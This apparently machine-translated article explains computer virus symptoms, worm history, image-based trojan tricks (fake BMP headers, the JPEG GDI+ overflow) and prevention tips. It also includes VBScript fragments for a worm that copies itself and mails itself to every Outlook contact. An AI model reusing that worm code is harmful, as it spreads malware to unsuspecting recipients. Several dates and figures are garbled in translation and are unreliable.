First, how to judge whether your computer is infected with a virus? Computer failure is not only due to virus infection, but also to the software and hardware failure of the computer itself. Network failure is mostly due to permission setting. Only by fully understanding the difference and connection between the two can we make a correct judgment and find the real virus in time. Below I briefly list some common computer fault symptom analysis caused by virus and software and hardware faults respectively. The following symptoms are 1 due to intrusion or software and hardware failure, which often crashes: viruses open many files or occupy a lot of memory; Unstable (such as poor memory quality and poor hardware overclocking performance); Running large-capacity software takes up a lot of memory and disk space; Some test software is used (there are many BUG);); ); Insufficient hard disk space and so on. ; When running software on the network, it often crashes, which may be because the network speed is too slow, the running program is too large, or the hardware configuration of your workstation is too low. 2. The system can't start: the virus modified the boot information of the hard disk or deleted some boot files. For example, the boot file of the boot virus is damaged; The hard disk is damaged or the parameters are set incorrectly; System files were deleted by mistake, etc. 3. Unable to open the file: the virus has modified the file format; The virus modified the file link location. The file is corrupted; Hard disk is damaged; The link location corresponding to the file shortcut has changed; The original software used to edit the file has been deleted; If it is in a local area network, the file storage location in the server has changed, and the workstation has not updated the contents of the new server in time (the resource manager has been open for a long time). 4, often report that the memory is not enough: the virus illegally occupies a lot of memory; Open a lot of software; Run software that requires memory resources; The system configuration is incorrect; Memory itself is not enough (the current basic memory requirement is 128M) and so on. 5, prompt hard disk space is not enough: the virus copied a large number of virus files (this encountered several situations, sometimes a good end of the near 10G hard disk installed with a WIN98 or WINNT4.0 system said that there is no space, the software installation will prompt that the hard disk space is not enough). The capacity of each partition of the hard disk is too small; Installed a large number of large-capacity software; All software is installed in a partition; The hard disk itself is small; If it is in a local area network, the system administrator sets a space limit for the workstation user's "private disk" for each user, because the capacity on the "private disk" has actually been used up by checking the size of the whole network disk. 6. When devices such as floppy disks are not accessed, read and write signals: virus infection; The floppy disk takes away the files that are still open and have been opened. 7. A large number of files of unknown origin appear: virus copy files; It may be a temporary file generated during the installation of a software; It may also be the configuration information and running records of some software. 8. Start a black screen: virus infection (the deepest memory is14.26 in 998, and I paid several thousand yuan for CIH. The first time I started the Windows screen that day, it crashed, and nothing happened when I started it again. Monitor failure; Graphics card failure; Main board failure; Overfrequency; CPU damage, etc. 9. Data loss: the virus deleted the file; Hard disk sector is damaged; Overwrite the original file due to file recovery; If it is a file on the network, it may be deleted by other users by mistake. Second, the type of worm virus 1, the type of worm virus:1988165438+10. On 2 October, the world's first computer worm was officially born. Morris, a first-year graduate student at Cornell University, wrote an experimental program to verify whether a computer program can copy and spread itself between different computers. In order to get the program into another computer smoothly, he wrote a piece of code to crack the user's password. 165438+1At 5: 00 on October 2, this program called "Worm" started its journey. It really lived up to Morris' expectations: it climbed into thousands of computers, causing them to crash, resulting in a record economic loss of 96 million dollars. Since then, the word "worm" has spread, but Morris may not know it: he proved this conclusion and opened Pandora's box. First, the mail worm: IFrame is an HTML language used to put a small page into a web page, which is used to realize the "frame" structure. At that time, a busybody tested a terrible phenomenon: when multiple IFrame were put into a page, the code in the framework that requested to run the program would be executed. If someone deliberately creates a page that destroys the program, the consequences can be imagined. Because the size of IFrame can be set freely, saboteurs can put multiple "invisible" frames in a page and attach multiple "invisible" harmful programs, so people who browse that page will naturally become victims! Compared with IFrame vulnerability, MIME vulnerability is more famous, which is actually just a small piece of data used to describe the information type. The browser knows how to deal with the received data by reading the data. If it is text and pictures, it will be displayed. If it is a program, a download confirmation will pop up. If it's music, play it directly. Please pay attention to the last type: music, and the action taken by the browser is: play. B, crawler in the webpage C, sociological worm D, system vulnerability worm 2, several typical virus examples A, oil painting A strange oil painting is circulating on the Internet. It is said that many people will hallucinate after reading it. Some people interpret it as a visual stimulus caused by the color of oil painting composition, while others think it is a psychological effect. Opinions vary, but there is no convincing answer. Facing two seemingly normal children on the screen can be fascinating. I didn't notice that the status bar in the lower left corner of IE browser has never stopped opening the progress bar of the page. The computer CD-ROM automatically pops up. Just press it back and it pops up again. The mouse ran around and the keyboard didn't respond. After a while, the computer restarts and stays in the error message "NTLDR lost …" forever. Obviously, this is another typical Trojan horse sabotage. What you opened was not a picture at all. IE browser is very powerful. It can automatically identify and open a file with a specific format, regardless of the file suffix, because IE judges that the file content is not based on the suffix, but on the file header and MIME. When a user opens a file, IE reads the header information of the file and looks up its corresponding MIME format description in the local registry database. For example, when opening a MIDI file, IE first reads a piece of data in front of the file. According to the standard definition of MIDI file, it must contain descriptive information beginning with "RIFF". According to this tag, IE found the MIME format of "x-audio/midi" in the registry. Then IE confirmed that she didn't have the ability to open this data, so she found a file with an opening suffix of ". MID "is based on the file suffix information in the registry and then submitted to this program for execution, and we will see the final result." It is because of this principle that IE is easily injured. It's the same here Intruders hide worms in web pages by forging MIME tag description information. What Xiao Wang opened was actually an HTML page with the suffix changed to a picture format, which contained virus files of the above two vulnerabilities and an IMG tag with the height and width set to 100%, so people thought it was just a picture file. However, behind this painting is an evil Trojan horse. Trojan horse program is relatively large, and it takes some time to download, which is why IE progress bar has never stopped. In order to ensure that the victim can download the complete Trojan file within the time of opening the page, the intruder adopts social engineering, so that the victim will not close the page in a short time. B, bitmap characteristics (BMP) He is a company's network administrator, and he has enough experience in server maintenance and security settings, so he doesn't need to be afraid of viruses that exploit browser vulnerabilities. On this day, in a technical forum, he saw a post posted by a netizen about the operating defects of some AMD processors and gave a link to a test page. According to the official description, if the CPU you use is defective, then you will see that the test pictures on the page are damaged and disordered. He was surprised: this is the model of CPU he used. He immediately clicked on the page link. Looking at the messy pictures on the page, he was relieved: there is something wrong with the CPU of this machine, and he wants to use this machine to process the important data of the company! He immediately went to the management department to discuss with the person in charge and put aside the machine that showed the picture of Holly whistle. The management promised to replace a machine for him as soon as possible and let him transfer the hard disk because it contains important business information. When he came back, he saw the photo still showing off. He closed the page in disgust and opened the folder where the information was stored as usual. His head suddenly went blank: the information is gone! Who deleted it? He frantically searched every corner of the hard disk, but those files seemed to evaporate. After a long time, he finally reacted: the machine was invaded! He took off the hard drive and went directly to the data recovery company. Afterwards, he carefully analyzed the reason, because the machine has passed the strict security test, and all the patches are ready, so it is impossible to pass the webpage vulnerability and overflow attack. The only thing that is questionable is the so-called vulnerability test web page. He quickly downloaded and analyzed the whole page of code and looked at the IMG tag with the suffix ". BMP "and a bunch of complicated script codes in the page source code, he knew that he was planted in the hands of BMP Trojan horse. The picture with "test flaw" has the same "flaw" on any machine, because it is not a picture file at all, but a Trojan horse program starting with BMP file header. Why does a seemingly docile drawing file become a murder weapon that harms people? This should start with bitmap format. Many friends should know the long-standing transmission method of "ciphertext", which is called "hidden characters in the picture", that is, adding a certain amount of data at the end of bitmap file without causing too much damage to the original bitmap file, which is caused by the loose restrictions of bitmap format. The method of judging a bitmap file by the system is not strict inquiry, but only reads its length, width, number of bits, file size and data area length from the 54 bytes of the file header to complete image recognition. The relaxed interrogation mechanism enabled BMP Trojan to be born. However, we must first clarify the concept. BMP Trojan is not an EXE file attached to the bottom of BMP bitmap file, but an independent EXE executable file, but its file PE header is replaced by bitmap file header. Because of the inquiry mechanism of the system, the EXE file is recognized as a bitmap file by the browser. Because it is a bitmap, in the program logic of the browser, it is a file that needs to be downloaded to the Internet cache folder and then displayed on the page. However, because this file is not a bitmap, it will naturally become a pile of meaningless junk data after being forcibly displayed, and it will become a chaotic image in the eyes of users. But this is not the cause of the Trojan horse crisis. We should pay attention to these words: "need to download to the online cache folder"! This shows that the browser has invited the wolf into the room-Trojan horse has settled down on the hard disk, but it is still sleeping because its file header has been changed to bitmap format, which makes it unable to run by itself. Since it can't run, it certainly can't do harm to the system. Then the extension left by the wolf on the hard disk is a waste, and the intruder can't let it go to waste. Therefore, when they make a page to download the Trojan horse to the browser, they will also set the page code for the browser to help take off the wolf's coat. After these steps, a bad wolf entered the system. This irretrievable fragility is terrible. It is difficult for users to know whether the page they are browsing is secretly downloading Trojan data, because even if they have patched all the patches, it will not help. Trojan was downloaded "legally" by IE, and it is not a code loophole. Moreover, it is difficult to judge whether this image is a Trojan program by the program itself. Instead of giving retinal imaging to the brain for judgment, the machine completes the processing work through binary. However, because this is also an intrusion method that requires downloading files, whether it can be downloaded or not and whether users are willing to look at the page depends on the social engineering of the intruder. Unless you use some "privacy statement" or tricks that can arouse people's interest, it is not the wisest choice to post a messy picture or a hidden picture frame on any page. The reason why the network administrator of that company was so unprepared was that the attacker stole people's "psychological blind zone". Because people were particularly sensitive to security, loopholes, viruses, leisure shelters and other contents, the intruder sent a professional leisure shelter case and deceived many people. This time he took the real event: some models of AMD CPU will cause image problems, so what will he take as bait next time? C, the curse of the devil (JPEG, GIF) For most users of an entertainment forum, today is a black day, because after they read an oil painting post of "Cursed Eyes", the system was destroyed for unknown reasons. The technical staff of the forum management immediately analyzed this post many times, but there was only one JPEG picture link on the whole page, and other malicious codes and programs did not exist at all. What did the intruder do to destroy the user's machine? Is it actually this JPEG picture? I'm afraid the answer is hard to accept. It is indeed this JPEG image that infected the user with the virus. Although virus research has never stopped, it is really unbearable to develop to this point: will you be infected with viruses if you continue to open text files? The picture attack with virus really made everyone sweat. However, as we all know, pictures in JPEG, GIF and other formats do not have the conditions for self-execution and virus transmission, which is illogical. Looking back on the events of September 14, 2004, Microsoft issued MS04-028 security bulletin: Buffer overflow in JPEG processing (GDI+) may enable code execution. Yes, this is the loophole. Its terminology is GDI+, and the corresponding dynamic link library is GdiPlus.dll. This is a kind of graphics device interface, which can provide two-dimensional media graphics, images and layouts for applications and programmers. Most Windows programs call this DLL to complete the processing of JPEG format pictures. But now, it is this "public figure" who has become the target of public criticism. At this point, the basic reader should understand that it is not the picture itself that can spread the virus, but the module responsible for graphics processing of the system will overflow when processing the picture, resulting in the malicious instructions carried in the picture being destroyed. If a picture tool uses its own processing module instead of calling this system module, then the picture that also contains malicious instructions cannot achieve the purpose of destruction. However, because this system module is the default processing module, most programs have fallen in front of "JPEG virus". How did this overflow come about? This should start with the principle of how the system reads JPEG format graphics. When the system processes a JPEG image, it needs to load the JPEG processing module into the memory, and then the JPEG processing module reads the image data into the memory space it occupies, which is the so-called buffer. Finally, we saw the display of the image. However, an error occurred when the image data entered the buffer-Windows specified the size of the buffer. However, the actual data volume is not strictly checked. This flawed boundary checking mode leads to a nightmare: the intruder processes the data of a JPEG image extremely large and adds malicious instructions, so what happens when the system loads the image into memory? Image data will fill the buffer provided by the whole JPEG processing module, just spilling malicious instructions into the memory area of the program itself, which is used to execute the instructions, that is, the core area, so that the malicious instructions are wrongly executed by the program, and the behavior of intruders destroying the system or invading the machine can be implemented normally. Some people may wonder, are intruders all divine operators? Why can they know exactly which data will overflow and execute it? The answer is simple, because when Windows allocates the space of the JPEG processing module, the starting address of the memory allocated to it is fixed, and the intruder can know what data will be executed by calculating the space size, so the JPEG virus spreads quickly. The so-called JPEG virus does not mean that JPEG images can release viruses, but that the system processing module of JPEG images executes the viruses carried by JPEG images, so we don't have to panic. As long as the loopholes in GDIPLUS.DLL are plugged, even if all JPEG images on your machine contain virus data, they can't escape and cause damage. As Austin, an assistant professor at Massachusetts State University, said, "Viruses are not just self-replicating codes, they need to spread through executable codes. JPEG files cannot execute code, they are data files opened by application software. The application software will not look for executable code in the data file, so it will not run these virus codes. " Worm virus is the biggest threat to individual users, and it is also the most difficult to eradicate, resulting in greater losses. For individual users, threatening worms usually spread through e-mail and malicious web pages. For worms that spread by email, social engineering is usually used. In other words, a malicious web page induces users to click and spread through various deceptive means. Specifically, it is a hacker's code destruction program, which is embedded in the webpage. When a user opens a webpage containing a virus without knowing it, the virus will break out. The principle of this virus code embedding technology is not complicated, so it will be used by many people with ulterior motives. In many hacker websites, forums about the technology of using web pages to destroy have appeared, and destructive program codes have been downloaded, which has caused a large-scale flood of malicious web pages and made more and more users suffer losses. For malicious web pages, vb scripts and java scripts are often used for programming! Because the programming method is simple! So it is very popular on the internet! Vb script and java script are parsed and executed by WSH (Windows Scripting Host Windows Script Host) of Microsoft operating system. Because of the simplicity of programming, such script viruses spread wildly on the Internet. Crazy love bug virus is a vbs script virus, and then disguised as an email attachment to lure users to click Run. What is even more frightening is that this kind of virus appears in the form of source code, and people who know a little script can modify their own code to form a variety. Let's take a simple script as an example: set o * * fs = createo * * ect ("scripting. Filesystemo * * ect ") (create file system object) o * * fs. createtextfile ("c: \ virus。 TXT ",1) (create txt by file system object). If we change the second sentence to: o * * fs.getfile (wscript.scriptfullname). Copy ("c: \ virus.vbs "), we can copy ourselves to the virus.vbs file on drive C, the script file is opened before this sentence, and there is WScript. ScriptFullName means that it is the program itself and a complete path file name. The GetFile function obtains this file, and the Copy function copies this file to the virus.vbs file in the root directory of drive C. In such a simple sentence, the function of self-replication is realized, and it already has the basic feature of virus-self-replication. This virus is often spread by mail, and it is also very simple to call the mail sending function in vb script. The virus often spreads by sending a self-contained email to the email address in the address book in outlook. A simple example is as follows: set o * * OA = wscript. Createo * * ect ("Outlook. Application ") (the object for creating Outlook applications) sets o**Mapi=o** OA. get namespace(" MAPI ")(get MAPI namespace)for I = 1 to o * * MAPI。 Address. Count set o * * Addlist = o * * MAPI. J = 1 to the address of o * * Addlist (i). Address. Mail count = 0 * * OA. Project (0) for creating * * mail. Recipient. Add (o * * Addlist。 Addresses (j)) (get the e-mail address of the recipient) o**Mail. Su**ect= "Hello!" (It is often tempting to set the subject of the email) o**Mail. Body= "The attachment for you this time is my new document!" (Set the contents of the letter) o * * Mail.attachments.add ("c: \ virus.vbs") (spread yourself as an attachment) o * * mail. Send next next Set O * * Mapi = none (clear o**Mapi variable and release resources) set o * * OA = none. The first line of this code is to create an Outlook object, which is very important. The following is a cycle in which letters with the same content are continuously sent to mailboxes in the address book. This is the spread of worms. It can be seen that it is very easy to write viruses by vb script, which makes such viruses diverse and destructive, and it is also very difficult to eradicate them! Third, individual users' preventive measures against worms Through the above analysis, we can know that viruses are not terrible, and network worms attack individual users mainly through social engineering, rather than taking advantage of system vulnerabilities! Therefore, we should pay attention to the following points to prevent this kind of virus: 1. Antivirus software must be installed. Rising integrated anti-virus software with powerful fire protection function, which greatly inhibited worms and Trojan horses. 2, often upgrade the virus database, anti-virus software is based on virus signature, viruses emerge one after another every day, especially in the Internet age, worms spread fast and have many variants, so it is necessary to update the virus database at any time, so as to kill the latest viruses! Usually once a week or more. However, because the anti-virus software we installed is usually installed on several machines, I will fail to upgrade, and the number of upgrades of an ID number software is limited every day. If this happens, we can upgrade another day, which can solve the problem. 3. Raise anti-virus awareness. Don't click on strange websites easily, which may contain malicious code! 4. Don't check unfamiliar emails at will, especially emails with attachments. Because some virus mails can be automatically executed by taking advantage of loopholes in ie and outlook, computer users need to upgrade ie and outlook programs and other commonly used applications! 1, message error, reply: email authentication reply: is it your reply? Pay attention to 5 again. Develop the habit of upgrading the system frequently: Specific methods A. Set the start menu to classic mode. However, click the windows update item in the Start menu and follow the instructions to complete the upgrade. B, you can also configure automatic update (this method is not recommended). 6. Don't trust the pictures and websites recommended to you in QQ. Sometimes these things are often sent to you by your friends (netizens). 7. Develop good computer application habits and back up important data. 8. Don't believe that someone has to use the message sent by the system messenger to visit unknown websites.
Viruses will always try their best to invade our computers and destroy them. Although you can use anti-virus software, don't ignore the usual preventive work. "Keeping the enemy out of the country" is the most ideal, so it is suggested that everyone adopt the principle of "prevention first" to deal with the virus. The following anti-virus anti-virus views, I hope to be useful to everyone.
1. Make an emergency disk first.
It is very necessary to make a non-toxic system emergency startup disk. It is best to copy an antivirus software and some practical tool software to this disk, and then turn off write protection.
Mind the entrance
With useful things, we all like to share them with our friends. According to our experience, we suggest that you don't use floppy disk to start the system before scanning the virus. Have you found that more than 90% viruses are boot viruses? Down does not execute unverified compressed files, such as files downloaded from the Internet (you can also consider _). Also, I advise you to be careful with email attachments (although some of them are in the form of words on the surface), even if they are sent by friends, don't double-click to run.
3. Implement backup
For the papers that we have worked so hard to create in our daily work, and all kinds of materials that we have collected from the Internet, these are the fruits of your labor. You should back them up at least once a week, preferably in a different place (that is, to a storage device other than your computer, such as a floppy disk or USB mobile hard disk). In this way, when the files in the computer are destroyed by viruses, it will be of great use. Of course, before that, you must ensure that your backup files are "clean".
4. "My computer"
You'd better not let others touch your personal computer casually: novices will always "mishandle" it or something, and prawns will inevitably want to borrow your favorite machine to try some axes he has just "studied". In either case, your information may be lost instantly, and it's too late to cry! So at least you should prevent others from using his own floppy disk or CD on your computer, whether intentionally or unintentionally.
Be alert to abnormal situations.
A word of advice: When using a computer at ordinary times, you must pay close attention to its performance. If you find abnormal symptoms, such as snail-slow speed and insufficient memory of 256MB, suddenly increase files you have never seen, increase or decrease the length of files you are familiar with, your first reaction should be: poisoning! ! ! At this time, you must stop what you are doing and kill the virus immediately. Don't be careless Otherwise, your losses will only get worse and worse. If the system crashes and everything goes up in smoke, it will be too late to regret it!
6. Don't forget to upgrade
Installing anti-virus software is not once and for all. Don't let the virus sneak into the system under the nose of antivirus software. Therefore, you should always pay attention to the anti-virus report or visit the corresponding anti-virus vendor's web page frequently to understand the latest virus activity trend, update the virus killing code and upgrade your anti-virus software.